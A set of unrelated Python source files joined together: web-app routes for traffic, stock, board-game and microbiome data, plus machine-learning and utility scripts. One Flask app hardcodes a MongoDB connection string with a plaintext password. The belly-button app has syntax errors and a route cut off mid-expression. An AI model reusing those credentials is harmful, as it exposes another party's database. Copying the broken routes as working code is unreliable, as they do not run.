    flows.append(lobConfig["flows"][searchParam["flowName"]])
    response = {}
    # Query the traffic data and add to metric list
    mongoQuery = data_query.DateRangeGroupQuery(fromDate, toDate, flows, granularity=granularity)
    data = mongoQuery.execute()
    metrics = {}
    metricsList = []
    flowName = mongoQuery.metrics[0]
    metricsList.append(flowName)
    metadata = mongoQuery.metadata
    if len(flows) == 1:
        # Run outage detection analysis
        metric = metricsList[0]
        flowLevelQuery = data_query.FlowLevelDateRangeQuery(fromDate, toDate, flows, metadata["granularity"], data)
        flowLevelData = flowLevelQuery.execute()
        data = util.merge2DateLists(flowLevelData, None, data, None)
        metricsList.extend(flowLevelQuery.metrics)
        outageQuery = data_query.OutageDateRangeQuery(fromDate, toDate, flows[0], metadata["granularity"])
        # Reuse the already-fetched series instead of re-querying.
        outageQuery.setPrecomputedData(data, metric)
        outageList = outageQuery.execute()
        data = util.merge2DateLists(outageList, [outageQuery.metric], data, None)
        metricsList.append(outageQuery.metric)
    # Create metadata info: classify each metric for the front end.
    for metric in metricsList:
        # NOTE(review): ``type`` shadows the builtin here; it is only used locally.
        if metric == flowName or metric == "dayAverage" or metric == "expected":
            type = "traffic"
        elif "Difference" in metric:
            type = "difference"
        else:
            type = "other"
        metrics[metric] = {"type": type}
    response["data"] = data
    response["metadata"] = {**{"metrics": metrics}, **metadata, "flowName": flowName}
    return jsonify(response)
@dataAPI.route('/insert', methods=["POST"])
@require_root
def insertData():
    """Accept an uploaded file and bulk-insert its rows (root only)."""
    upload = request.files['file']
    # Decode the raw upload into a text stream for the insertor.
    text_stream = io.StringIO(upload.stream.read().decode("UTF8"), newline=None)
    DataInsertor().run(text_stream)
    return jsonify({})
# @dataAPI.route('/best_correlations', methods=["GET"])
# def bestCorrelations():
# lobName = request.args.get('lobName')
# granularity = int(request.args.get('granularity'))
# from support_development_packages.data_util import correlation
# bestCorrelations = correlation.getBestCorrelations(lobName, granularity=granularity)
# return jsonify(bestCorrelations)
#
#
# @dataAPI.route('/averages', methods=["GET"])
# def getDayAverages():
# lobName = request.args.get('lobName')
# from support_development_packages.data_util.moving_average import DayAverageExecutor
# return jsonify(DayAverageExecutor.getDayAverages(lobName))
#
#
# @dataAPI.route('/day_medians', methods=["GET"])
# def getDayMedians():
# """deprecated"""
# lobName = request.args.get('lobName')
# requestDate = request.args.get('date')
# if requestDate is None:
# requestDate = datetime.datetime.now()
# else:
# requestDate = util.jsStringToDate(requestDate)
# requestDate = util.resetDateTimeMidnight(requestDate)
# medianQuery = data_query.ExpectedTrafficQuery(lobName, requestDate)
# medians = medianQuery.execute()
# dataList = util.dateDictToList(data_query.minuteDictToDateDict(requestDate, medians, "median"))
# response = {}
# response["data"] = dataList
# response["granularity"] = medianQuery.metadata["granularity"]
# response["metrics"] = ["median"]
# return jsonify(response)
#
# def createMergedFlowsObject(country, lobName, flowType):
# flow = {}
# flow["name"] = lobName + "-" + flowType
# flow["type"] = "all_forwards"
# flow["lobName"] = lobName
# flow["dataPath"] = country + "." + lobName + "." + flowType + ".sum"
# flow["gName"] = lobName + "_" + flowType
# flow["country"] = country
# flow["options"] = MediationConfig.getLobWithCountry(country, lobName)["options"]
# return flow
# def smoothData(data, granularity, validMetricName):
# dataList = []
# for row in data:
# dataList.append(row[validMetricName])
# smoothedData = smooth.smoothData(granularity, dataList)
# for index, elem in enumerate(smoothedData):
# data[index][validMetricName + "_smoothed"] = elem
|
from time import sleep
import requests
import pandas as pd
import matplotlib.pyplot as plt
from config import password
from date_handler import date_id_sequence, to_string
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Float, func, create_engine, ForeignKey, text, and_
from sqlalchemy.orm import Session
import datetime as dt
from flask import jsonify
#Create ORM Classes
# Declarative base shared by all table mappings below.
Base=declarative_base()
class Sector(Base):
    """Lookup table of market sectors."""
    __tablename__="sectors"
    sector_id = Column(Integer, primary_key=True)
    sector = Column(String(30))
class Ticker(Base):
    """A listed company, keyed by its ticker symbol."""
    __tablename__="tickers"
    ticker = Column(String(30),primary_key=True)
    company_name = Column(String(100))
    sector_id = Column(Integer, ForeignKey("sectors.sector_id"))
class Currency(Base):
    """Lookup table of currencies referenced by the exchange-rate table."""
    __tablename__="currencies"
    currency_id = Column(Integer, primary_key=True)
    currency_symbol = Column(String(50))
class Date(Base):
    """Calendar dimension; ``date_id`` is the integer key other tables join on."""
    __tablename__="calendar"
    date_id = Column(Integer,primary_key=True)
    day = Column(Integer)
    month = Column(Integer)
    day_of_year = Column(Integer)
    day_of_quarter = Column(Integer)
    year = Column(Integer)
class Stock(Base):
    """Daily OHLCV prices, keyed by (ticker, date_id)."""
    __tablename__="stocks"
    ticker = Column(String(30),ForeignKey("tickers.ticker"),primary_key=True)
    date_id = Column(Integer,ForeignKey("calendar.date_id"),primary_key=True)
    open_price = Column(Float())
    close_price = Column(Float())
    high_price = Column(Float())
    low_price = Column(Float())
    volume = Column(Integer)
class Exchange_rate(Base):
    """Daily open/close FX rate between two currencies, keyed per date."""
    __tablename__="exchange_rates"
    from_currency_id = Column(Integer, ForeignKey("currencies.currency_id"),primary_key=True)
    to_currency_id = Column(Integer, ForeignKey("currencies.currency_id"),primary_key=True)
    date_id = Column(Integer, ForeignKey("calendar.date_id"),primary_key=True)
    open_value = Column(Float())
    close_value = Column(Float())
#Create Connection
# Close a stale connection from a previous interactive run, if one exists.
# NOTE(review): ``conn`` is never bound at module scope here, so the
# NameError branch always runs and this block is effectively a no-op.
try:
    conn.close()
except NameError:
    pass
def get_data(currency,ticker,from_date,to_date):
    """Return OHLCV rows for ``ticker`` between two date_ids, converted from
    USD into ``currency`` via the stored daily exchange rates.

    Parameters:
        currency: target currency symbol as stored in ``currencies``.
        ticker: stock ticker key in ``tickers``/``stocks``.
        from_date: first date_id included (YYYYMMDD-style integer).
        to_date: first date_id excluded.

    Returns:
        dict with 'Request_Data' (echo of the arguments) and 'Stock_Data'
        (per-date dicts of price strings suffixed with the currency).
    """
    engine = create_engine(f"postgresql://postgres:{password}@localhost:5432/Stocks")
    conn = engine.connect()
    session = Session(bind=engine)
    Base.metadata.create_all(engine)
    # Resolve the target currency's id; .one() raises if the symbol is unknown.
    currency_id = session.query(Currency.currency_id).filter(Currency.currency_symbol == currency).one()[0]
    E = Exchange_rate
    # USD (currency_id 1) -> target-currency rates, joined per date below.
    ex_rates = session.query(Exchange_rate.date_id,Exchange_rate.open_value,Exchange_rate.close_value).filter(and_(E.from_currency_id==1,
                            E.to_currency_id==currency_id)).subquery()
    # NOTE(review): high/low are converted with the day's *open* rate while
    # close uses the close rate — confirm that mix is intended.
    data = session.query(Stock.ticker,
                        Stock.date_id,
                        (Stock.open_price*ex_rates.c.open_value).label(f"open_{ticker}_{currency}"),
                        (Stock.high_price*ex_rates.c.open_value).label(f"high_{ticker}_{currency}"),
                        (Stock.low_price*ex_rates.c.open_value).label(f"low_{ticker}_{currency}"),
                        (Stock.close_price*ex_rates.c.close_value).label(f"close_{ticker}_{currency}"),
                        Stock.volume).\
            filter(and_(Stock.ticker==ticker,
                        Stock.date_id >= from_date,
                        Stock.date_id < to_date,
                        Stock.date_id == ex_rates.c.date_id)).all()
    data_json = {}
    data_json['Request_Data'] = {'Ticker' : ticker ,
                                 'Currency' : currency ,
                                 'From_Date' : from_date ,
                                 'To_Date': to_date}
    data_json['Stock_Data'] = {}
    for x in data:
        print(to_string(x[1]))
        data_json['Stock_Data'][to_string(x[1])] = {'open_price' : str(round(x[2],2))+f' {currency}',
                                                    'high_price' : str(round(x[3],2))+f' {currency}',
                                                    'low_price' : str(round(x[4],2))+f' {currency}',
                                                    'close_price' : str(round(x[5],2))+f' {currency}',
                                                    'volume' : str(x[6])}
    # Close the ORM session as well as the raw connection; the session was
    # previously leaked on every call.
    session.close()
    conn.close()
    return data_json
# Ad-hoc smoke test: fetch converted prices for ticker 'A' in RUB.
print(get_data('RUB','A',20200000,20200225))
|
# 逻辑回归
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score, recall_score
# Read data from `.txt` file
def read_from_txt(filePath):
    """Load a comma-separated text file into a 2-D numpy array of strings.

    Each non-blank line becomes one row; fields are split on ','. Unlike the
    original, the file handle is managed with ``with``, trailing newlines are
    stripped (so the last column no longer carries '\\n'), and blank lines are
    skipped instead of producing ragged rows.

    :param filePath: path of the text file to read.
    :return: numpy array of shape (rows, fields), dtype str.
    """
    with open(filePath) as f:
        data_list = [line.rstrip("\n").split(",") for line in f if line.strip()]
    return np.array(data_list)
# Load the data and preprocess
raw_data = read_from_txt('data_banknote_authentication.txt')
data = raw_data[:, :4].astype(float)
data = StandardScaler().fit_transform(data)
labels = raw_data[:, 4]
# Labels are single digits (0/1); take the first character of each field.
labels = [int(i[0]) for i in labels]
# Shuffle: without shuffling the test split contains only one class
np.random.seed(1)
idx = np.arange(len(labels))
np.random.shuffle(idx)
data = data[idx]
labels = np.array(labels)[idx]
# Split into training and test sets
train_data = data[:1200]
train_label = labels[:1200]
test_data = data[1200:]
test_label = labels[1200:]
# Train
clf = LogisticRegression(random_state=0).fit(train_data, train_label)
# Predict
pred_label = clf.predict(test_data)
# Report precision and recall
print(precision_score(test_label, pred_label))
print(recall_score(test_label, pred_label))
|
"""
This file contains the implementation of the Typofinder class.
Use this class to find typos in a file based on a dictionary.
"""
import logging
from src.utils import get_words
# Root logger configuration for the typofinder package; module loggers below
# are children of "typofinder" so they share this format.
logging.basicConfig(format='[%(asctime)s][%(levelname)8s][%(name)s]: %(message)s')
_root_log = logging.getLogger("typofinder")
_log = _root_log.getChild(__name__)
class Typofinder(object):
    """
    Uses a Linguist to decide if a file has typos.

    Fix: the Python 2 ``file()`` builtin (removed in Python 3) has been
    replaced with ``open()`` in context managers; the rest of this class
    already used Python 3 ``print(...)`` calls.
    """

    def __init__(self, linguist, text_file_path):
        self._log = _log.getChild(self.__class__.__name__)
        self._linguist = linguist
        self._text_file_path = text_file_path
        # Maps each unknown (lowercased) word to a suggested fix, or None.
        self._result_map = {}

    def print_result_map(self):
        """
        Prints a file's typos and suggestions for misspelled words in a table format.
        """
        if not self._result_map:
            _log.debug("Result map is empty.")
            return
        print("\n" + "+" * 72)
        print("{0:33} ==> {1:>33}".format("Unknown word", "Suggestion"))
        print("-" * 72)
        for word, suggestion in sorted(self._result_map.items()):
            if suggestion:
                print("{0:33} ==> {1:>33}".format(word, suggestion))
            else:
                print("{0:33}".format(word))
        print("+" * 72 + "\n")

    def print_affected_rows(self, is_overwrite_mode=False):
        """
        Prints the text file's lines (and it's numbers) where typos were detected.
        It is useful for logging information.
        When ``is_overwrite_mode`` is True, the annotated lines are written
        back to the file instead of being printed.
        """
        if not self._result_map:
            _log.debug("Result map is empty.")
            return
        # ``file()`` does not exist in Python 3; open with a context manager.
        with open(self._text_file_path) as f:
            content = f.readlines()
        content = [line.strip("\n") for line in content]
        line_number = 0
        for line in content:
            line_number += 1
            line_word_set = set(get_words(line))
            typo_list = self._result_map.keys()
            # Lowering the line's words is necessary because the Linguist's dictionary
            # contains the words in lowercase too.
            if not set([word.lower() for word in line_word_set]).intersection(typo_list):
                # Checking line is unnecessary because there is no unknown word. Skip to next line.
                continue
            for word in line_word_set:
                word_lowered = word.lower()
                if word_lowered not in typo_list:
                    continue
                suggestion = self._result_map.get(word_lowered)
                if suggestion:
                    line = line.replace(word, "[[%s ==> %s]]" % (word, suggestion))
                else:
                    line = line.replace(word, "[[%s]]" % word)
            if is_overwrite_mode:
                content[line_number - 1] = line
            else:
                print("%d:%s" % (line_number, line.strip()))
        if is_overwrite_mode:
            with open(self._text_file_path, 'w') as f:
                # The newline character is needed for the end of the file.
                f.write("\n".join(content) + "\n")
        else:
            print("")

    def execute(self):
        """
        Checks a file for typos and makes suggestions based on the Linguist.
        The typofinder's result map will contain the unknown words and a suggestion for fix if possible.
        """
        _log.info("Executing typofinder on \'%s\'" % self._text_file_path)
        if not self._linguist.get_dictionary():
            _log.error("Linguist's dictionary is empty. Couldn't recognize typos in file(s).")
            return
        # ``file()`` does not exist in Python 3; open with a context manager.
        with open(self._text_file_path) as f:
            content = set(get_words(f.read()))
        difference = self._linguist.not_known(content)
        if not difference:
            _log.info("No typo(s) found in file: \'%s\'" % self._text_file_path)
            return
        for word in difference:
            self._result_map[word] = self._linguist.correct(word)
        print("Unknown word(s) has been found in file: \'%s\'" % self._text_file_path)
|
import re
import urllib.request
from pathlib import Path
from django.core.management import BaseCommand
from django.db.models.signals import post_save
from django.utils import timezone
from pybb.models import Post, Topic
from pybb.signals import post_saved
from notifications.models import create_pybb_post_notification
from pandas import read_csv
class Command(BaseCommand):
    help = "First run: store images. Second run: replace links."

    def handle(self, *args, **options):
        """Mirror forum-post images locally and rewrite their links to the CDN."""
        # CSV log of every image processed on this run.
        s = ''
        s += "Post ID,Image Link,Filename\n"
        table = read_csv('forum/dat/images/list.csv')
        from pybb.signals import topic_saved
        # FIXME: we should have specific signals to send notifications to topic/forum subscribers
        # but for now, we must connect / disconnect the callback
        post_save.disconnect(topic_saved, sender=Topic)
        post_save.disconnect(create_pybb_post_notification, sender=Post)
        post_save.disconnect(post_saved, sender=Post)
        # Pass 1: replace previously-mirrored links listed in the CSV.
        for i in range(len(table)):
            post_id = int(table['Post ID'][i])
            old_link = table['Image Link'][i]
            filename = table['Filename'][i]
            new_link = 'https://files.le-francais.ru/images/forum/' + filename
            post = Post.objects.get(id=post_id)
            post.body = post.body.replace(old_link, new_link)
            post.save()
        post_save.connect(topic_saved, sender=Topic)
        post_save.connect(create_pybb_post_notification, sender=Post)
        post_save.connect(post_saved, sender=Post)
        # Pass 2: download images referenced by recent posts (last 24 weeks).
        for post in Post.objects.all():
            if post.created < timezone.now()-timezone.timedelta(weeks=24):
                continue
            # Raw string avoids invalid-escape warnings in the pattern.
            for link in re.findall(r'\((((http://)|(https://))(\S+?\.(png|jpeg|gif|jpg)))', post.body, re.I):
                file_name = link[0].split('//')[1]
                file_name = re.sub('/', '+', file_name)
                file_name = re.sub(',', '_', file_name)
                if link[0].startswith('https://files.le-francais.ru'):
                    continue
                image_string = 'https://www.le-francais.ru' + str(post.get_absolute_url()) + '\t' + link[0]
                file = Path('forum/dat/images/' + file_name[:])
                try:
                    print(image_string, end='')
                    if not file.is_file():
                        opener = urllib.request.build_opener()
                        opener.addheaders = [('User-Agent', 'Mozilla/5.0')]
                        urllib.request.install_opener(opener)
                        urllib.request.urlretrieve(link[0], 'forum/dat/images/' + file_name[:])
                        print(' Success!')
                    else:
                        print(' File already exist')
                    s += str(post.id) + ',' + link[
                        0] + ',' + file_name[:] + '\n'
                except Exception:
                    # Best-effort: keep going on download errors, but no
                    # longer swallow KeyboardInterrupt/SystemExit (the
                    # original used a bare ``except``).
                    print(' Error')
        # Context manager closes the log file (handle was previously leaked).
        with open('forum/dat/images/list.csv', 'w') as out:
            out.write(s)
|
from flask import Flask, render_template, url_for, request, redirect, session
import pymongo
from pymongo import MongoClient
from bson.objectid import ObjectId
from mongoengine import *
import requests
import re
# NOTE(review): database credentials are embedded in this connection string;
# move them to environment variables or config before sharing this code.
client = MongoClient("mongodb+srv://teama7:ee461lteama7@mongodbcluster.bs58o.gcp.mongodb.net/BGDB?retryWrites=true&w=majority")
db = client["BGDB"]
# mongoengine connection to a local instance (separate from the Atlas client above).
connect('BGDB', host='localhost', port=27017)
# Collections used by the view functions below.
boardgameobjects = client["BGDB"].boardgamecollection
genre_objects = client["BGDB"].genrecollection
publish_objects = client["BGDB"].publishercollection
# Module-level request state shared between the POST routing handlers and
# the instance pages they redirect to.
gamepagerequest = ''
pubnamerequest = ''
genre_name_request = ''
pubpagerequest = {}
genre_page_request = {}
app = Flask(__name__)
def GameLinkify(name):
    """Build a URL-safe slug by stripping every non-alphanumeric character."""
    return re.compile('[^a-zA-Z0-9]').sub('', name)
def PublisherNames():
    """Collect publisher names with the first game and year seen for each.

    Returns a tuple of three parallel lists (names, first game, first year)
    so the publisher page can tie a game/year to each publisher. A stored
    publisher of 'None' is reported as "unaffiliated".
    """
    names = []
    first_games = []
    first_years = []
    for game in boardgameobjects.find():
        publisher = game['Publisher']
        # Skip publishers we have already recorded (checked against the
        # stored value, before the 'None' -> "unaffiliated" rewrite).
        if publisher in names:
            continue
        if publisher == 'None':
            publisher = "unaffiliated"
        names.append(publisher)
        first_games.append(game['Name'])
        first_years.append(game['Year_Published'])
    return names, first_games, first_years
@app.route('/')
def home():
    """Landing page: three featured games, genres and publishers."""
    games = boardgameobjects.find().limit(3)
    genres = genre_objects.find().limit(3)
    publishers = publish_objects.find().limit(3)
    return render_template('home.html', games=games, genres=genres, publishers=publishers)
@app.route('/about')
def about():
    """Static about page."""
    return render_template('about.html')
############# LIST PAGES #####################
@app.route('/boardgames/<int:page>')
def games(page):
    """Paginated list of all board games."""
    global boardgameobjects
    gameobjects = boardgameobjects.find()
    return render_template('Board_Games_List.html', gameobjects=gameobjects, page=page,)
@app.route('/boardgamegenres/<int:page>')
def genres(page):
    """Paginated list of genres."""
    global genre_objects
    genre_obj = genre_objects.find()
    return render_template('Genres_List.html', genres=genre_obj, page=page)
@app.route('/boardgamepublishers/<int:page>', methods=['POST', 'GET'])
def publishers(page):
    """Paginated list of publishers.

    NOTE(review): the name list from PublisherNames() is immediately
    overwritten by the Mongo cursor two lines later, so the template's
    ``publishernames`` argument receives the cursor, not the list —
    confirm which one the template expects.
    """
    global boardgameobjects
    publishersTupple = PublisherNames()
    publishers = publishersTupple[0]
    publishergame = publishersTupple[1]
    publishyear = publishersTupple[2]
    publishers = publish_objects.find()
    gameobjects = boardgameobjects.find()
    return render_template('Publishers_List.html', publishers=publishers, publishernames=publishers, gameobjects=gameobjects, publishergame=publishergame, publishyear=publishyear, page=page)
############ ROUTE TO GENRE INSTANCE PAGES ############
@app.route('/genre', methods=['POST'])
def genre_routing():
    """Store the posted genre name in module state, then redirect to its page."""
    genre_name = request.form['genrename']
    global genre_name_request
    genre_name_request = genre_name
    genre_link = GameLinkify(genre_name)
    return redirect(url_for('.genre_page', genre_link=genre_link))
@app.route('/genre/<genre_link>', methods=['POST', 'GET'])
def genre_page(genre_link):
    """Render the genre page for the most recently posted genre name.

    NOTE(review): the lookup uses module-level state rather than
    ``genre_link``, so direct/bookmarked visits depend on a prior POST.
    """
    global genre_name_request
    global genre_objects
    genre = genre_objects.find({'Name': genre_name_request}).next()
    return render_template("Genre_Template.html", genre=genre)
############ ROUTE TO PUBLISHER INSTANCE PAGES ############
@app.route('/publisher', methods=['POST'])
def PubRouting():
    """Store the posted publisher name, then redirect to its page."""
    publisher_name = request.form['publishername']
    global pubnamerequest
    pubnamerequest = publisher_name
    publisherlink = GameLinkify(publisher_name)
    return redirect(url_for('.PubPage', publisherlink=publisherlink))
@app.route('/publisher/<publisherlink>', methods=['POST', 'GET'])
def PubPage(publisherlink):
    """Render a publisher page; like genre_page, keyed off module state."""
    global pubnamerequest
    publisher = publish_objects.find({'Publisher': pubnamerequest}).next()
    publishersTupple = PublisherNames()
    publishers = publishersTupple[0]
    publishergame = publishersTupple[1]
    publishyear = publishersTupple[2]
    return render_template("Publisher_Template.html", publisher=publisher, gamesforpub=publishergame, publishername=pubnamerequest, publishyear=publishyear)
############ ROUTE TO GAME INSTANCE PAGES ############
@app.route('/game', methods=['POST'])
def GameRouting():
    """Store the posted game name, then redirect to its page."""
    gamename = request.form['gamename']
    gamelink = GameLinkify(gamename)
    global gamepagerequest
    gamepagerequest = gamename
    return redirect(url_for('.GamePage', gamelink=gamelink))
@app.route('/game/<gamelink>')
def GamePage(gamelink):
    """Render the game page for the most recently posted game name."""
    global gamepagerequest
    game = boardgameobjects.find({'Name': gamepagerequest}).next()
    return render_template("Board_Game_Template.html", game=game)
if __name__ == "__main__":
    app.run(debug=True)
import re
from builtins import range
def camel_to_under(name):
    """Convert a camel-case string to lowercase separated by underscores.

    Written by epost (http://stackoverflow.com/questions/1175208).

    :param name: string to convert
    :return: lowercased, underscore-separated copy of ``name``
    """
    step = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
    step = re.sub("([a-z0-9])([A-Z])", r"\1_\2", step)
    return step.lower()
def get_as_dict(x):
    """Return an object as a dictionary of its attributes.

    Dicts pass through unchanged; namedtuple-likes go via ``_asdict``;
    everything else falls back to ``__dict__``.
    """
    if isinstance(x, dict):
        return x
    try:
        return x._asdict()
    except AttributeError:
        return x.__dict__
def tokens_to_ngrams(tokens, n_min=1, n_max=3, delim=" ", lower=False):
    """Yield every n-gram of ``tokens`` with length n_min..n_max, joined by
    ``delim``; lowercase each n-gram when ``lower`` is True."""
    total = len(tokens)
    for start in range(total):
        longest = min(n_max, total - start)
        for length in range(max(n_min, 1), longest + 1):
            gram = delim.join(tokens[start : start + length])
            yield gram.lower() if lower else gram
|
# import necessary libraries
import json
from flask import (
Flask,
render_template,
jsonify,
request)
from flask_sqlalchemy import SQLAlchemy
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Database Setup
#################################################
# The database URI (local sqlite file shipped with the project)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///DataSets/belly_button_diversity.sqlite"
db = SQLAlchemy(app)
class Button(db.Model):
    """One belly-button sample row: demographics plus location climate metrics.

    Column names are kept uppercase to match the source sqlite table.
    (The 012/1319 suffixes presumably denote age/year bands — confirm
    against the dataset documentation.)
    """
    __tablename__ = 'button'
    SAMPLEID = db.Column(db.Integer, primary_key = True)
    EVENT = db.Column(db.String)
    ETHNICITY = db.Column(db.String)
    GENDER = db.Column(db.String)
    AGE = db.Column(db.Integer)
    WFREQ = db.Column(db.Integer)
    BBTYPE = db.Column(db.String)
    LOCATION = db.Column(db.String)
    COUNTRY012 = db.Column(db.String)
    ZIP012 = db.Column(db.Integer)
    COUNTRY1319 = db.Column(db.String)
    ZIP1319 = db.Column(db.Integer)
    DOG = db.Column(db.String)
    CAT = db.Column(db.String)
    IMPSURFACE013 = db.Column(db.Integer)
    NPP013 = db.Column(db.Float)
    MMAXTEMP013 = db.Column(db.Float)
    PFC013 = db.Column(db.Float)
    IMPSURFACE1319 = db.Column(db.Integer)
    NPP1319 = db.Column(db.Float)
    MMAXTEMP1319 = db.Column(db.Float)
    PFC1319 = db.Column(db.Float)
@app.route("/")
def home():
    """Return the dashboard homepage.

    Fix: the docstring sat between the decorator and ``def``, which is a
    SyntaxError; it now lives inside the function.
    """
    return render_template("index.html")
@app.route('/names')
def sample_names():
    """Return the list of sample names as JSON.

    Fix: the docstring sat between the decorator and ``def`` (SyntaxError),
    and ``pd`` was never imported anywhere in this module.
    """
    import pandas as pd  # local import: pandas is not imported at module level

    # NOTE(review): the query selects only SAMPLEID but two columns are named
    # here, and jsonify cannot serialise a DataFrame directly — this route
    # likely needs df.to_dict(...); confirm against the front-end contract.
    query_statement = db.session.query(Button.SAMPLEID).all()
    df = pd.DataFrame(query_statement, columns = ['name', 'id'])
    return jsonify(df)
@app.route('/otu')
"""List of OTU descriptions."""
def descriptions():
query_statement = db.session.query(Button.) |
import math
# Numeric literal types: int, float, complex.
x = 1
x = 1.1
x = 1 + 2j # complex number
# Arithmetic operators.
print(10 + 3)
print(10 - 3)
print(10 * 3)
print(10 / 3)   # true division: always a float
print(10 // 3)  # floor division
print(10 % 3)   # modulo
print(10 ** 3)  # exponentiation
# Augmented assignment is shorthand for rebinding.
x = 10
x = x + 3
x += 3
print(x)
# Rounding, absolute value, and ceiling helpers.
print(round(2.9))
print(abs(-2.4))
print(math.ceil(2.2))
# input() returns a string; convert before doing arithmetic.
x = int(input("x: "))
y = x + 1
print(y)
print(type(y))
# False values in Python
# ""
# 0
# None
from flask import Flask
from flask import request
app = Flask(__name__)
@app.route('/', methods=['GET','POST'])
def serve_part2():
    """Validate the ``userid`` and ``n`` request arguments, then respond.

    Returns a short error string when either argument is missing or
    ``n`` is not numeric; otherwise returns the placeholder payload.
    """
    args = request.args
    user_id = args.get('userid')
    if user_id is None:
        return "user id is invalid"
    n = args.get('n')
    if n is None:
        return "n is invalid"
    try:
        int(n)
    except Exception:
        return "n is not a number"
    return "nice, its working"
if __name__ == '__main__':
    # BUG FIX: the original used the Python 2 print statement, which is a
    # SyntaxError under Python 3 (the rest of this file is Python 3).
    print("web service is running")
    app.run(debug=True)
|
"""
This module contains functions that validate neural networks for predicting device performance,
based on tabular data and m2py labels
"""
import os
import sys
import numpy as np
import torch
import torch.nn as nn
module_path = os.path.abspath(os.path.join('./'))
if module_path not in sys.path:
sys.path.append(module_path)
import physically_informed_loss_functions as PhysLoss
torch.manual_seed(28)
def eval_OPV_df_model(model, testing_data_set):
    """Evaluate a four-headed OPV device-performance model on a test set.

    The model must return four outputs per batch (PCE, Voc, Jsc, FF).
    Each head gets its own ThresholdedMSELoss; MAPE is the accuracy
    metric.  All metrics are averaged over batches.

    :param model: torch.nn.Module returning (PCE, Voc, Jsc, FF) tensors
    :param testing_data_set: iterable of (inputs, pce, voc, jsc, ff) batches
    :return: (total loss, four per-head losses, four per-head accuracies)
    """
    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    #evaluate the model
    model.eval()
    # NOTE(review): lower/upper presumably bound the MSE to each figure of
    # merit's physically plausible range — confirm in PhysLoss.
    pce_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 6)
    voc_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 1)
    jsc_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 10)
    ff_criterion = PhysLoss.ThresholdedMSELoss(lower = 10, upper = 85)
    accuracy = PhysLoss.MAPE()
    #don't update nodes during evaluation b/c not training
    with torch.no_grad():
        test_losses = []
        pce_test_losses = []
        voc_test_losses = []
        jsc_test_losses = []
        ff_test_losses = []
        pce_test_acc_list = []
        voc_test_acc_list = []
        jsc_test_acc_list = []
        ff_test_acc_list = []
        test_total = 0  # number of batches seen
        for inputs, pce_labels, voc_labels, jsc_labels, ff_labels in testing_data_set:
            inputs = inputs.to(device)
            pce_labels = pce_labels.to(device)
            voc_labels = voc_labels.to(device)
            jsc_labels = jsc_labels.to(device)
            ff_labels = ff_labels.to(device)
            PCE_out, Voc_out, Jsc_out, FF_out = model(inputs)
            # calculate loss per batch of testing data
            pce_test_loss = pce_criterion(PCE_out, pce_labels)
            voc_test_loss = voc_criterion(Voc_out, voc_labels)
            jsc_test_loss = jsc_criterion(Jsc_out, jsc_labels)
            ff_test_loss = ff_criterion(FF_out, ff_labels)
            # total loss is the unweighted sum of the four heads
            test_loss = pce_test_loss + voc_test_loss + jsc_test_loss + ff_test_loss
            test_losses.append(test_loss.item())
            pce_test_losses.append(pce_test_loss.item())
            voc_test_losses.append(voc_test_loss.item())
            jsc_test_losses.append(jsc_test_loss.item())
            ff_test_losses.append(ff_test_loss.item())
            test_total += 1
            pce_acc = accuracy(PCE_out, pce_labels)
            voc_acc = accuracy(Voc_out, voc_labels)
            jsc_acc = accuracy(Jsc_out, jsc_labels)
            ff_acc = accuracy(FF_out, ff_labels)
            pce_test_acc_list.append(pce_acc)
            voc_test_acc_list.append(voc_acc)
            jsc_test_acc_list.append(jsc_acc)
            ff_test_acc_list.append(ff_acc)
        # average every metric over the number of batches
        test_epoch_loss = sum(test_losses)/test_total
        pce_test_epoch_loss = sum(pce_test_losses)/test_total
        voc_test_epoch_loss = sum(voc_test_losses)/test_total
        jsc_test_epoch_loss = sum(jsc_test_losses)/test_total
        ff_test_epoch_loss = sum(ff_test_losses)/test_total
        pce_epoch_acc = sum(pce_test_acc_list)/test_total
        voc_epoch_acc = sum(voc_test_acc_list)/test_total
        jsc_epoch_acc = sum(jsc_test_acc_list)/test_total
        ff_epoch_acc = sum(ff_test_acc_list)/test_total
        print(f"Total Epoch Testing Loss = {test_epoch_loss}")
        print(f"Total Epoch Testing Accuracy: PCE = {pce_epoch_acc}")
        print(f" Voc = {voc_epoch_acc}")
        print(f" Jsc = {jsc_epoch_acc}")
        print(f" FF = {ff_epoch_acc}")
    return test_epoch_loss, pce_test_epoch_loss, voc_test_epoch_loss, jsc_test_epoch_loss, ff_test_epoch_loss, pce_epoch_acc, voc_epoch_acc, jsc_epoch_acc, ff_epoch_acc
def eval_OPV_m2py_model(model, testing_data_set, criterion):
    """Evaluate *model* on *testing_data_set* and return the mean batch loss.

    :param model: torch.nn.Module mapping inputs -> outputs
    :param testing_data_set: iterable of (inputs, labels) batches
    :param criterion: loss callable applied per batch
    :return: sum of per-batch losses divided by the number of batches
    """
    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    #evaluate the model
    model.eval()
    #don't update nodes during evaluation b/c not training
    with torch.no_grad():
        test_losses = []
        test_total = 0
        for inputs, labels in testing_data_set:
            # BUG FIX: the original did `images = images.to(device)`, which
            # raises NameError on the first batch; move `inputs` instead.
            inputs = inputs.to(device)
            labels = labels.to(device)
            outputs = model(inputs)
            # calculate loss per batch of testing data
            test_loss = criterion(outputs, labels)
            test_losses.append(test_loss.item())
            test_total += 1
        total_test_loss = sum(test_losses)/test_total
        print (f"Total testing loss is: {total_test_loss}")
        return total_test_loss
|
'''Write a python function find_smallest_number() which accepts a number n and returns the smallest number having n divisors.
Handle the possible errors in the code written inside the function.
Sample Input Expected Output
16 120
'''
def find_divisors(num):
    """Return the number of positive divisors of *num*.

    Counts divisors in pairs (i, num // i) up to sqrt(num), so it runs in
    O(sqrt(n)) instead of the original O(n) scan; a perfect-square root is
    counted once.  Returns 0 for num < 1, matching the original behavior.
    """
    count = 0
    i = 1
    while i * i <= num:
        if num % i == 0:
            # i and num//i are a divisor pair; equal only for perfect squares
            count += 1 if i == num // i else 2
        i += 1
    return count
def find_smallest_number(num):
    """Return the smallest positive integer having exactly *num* divisors.

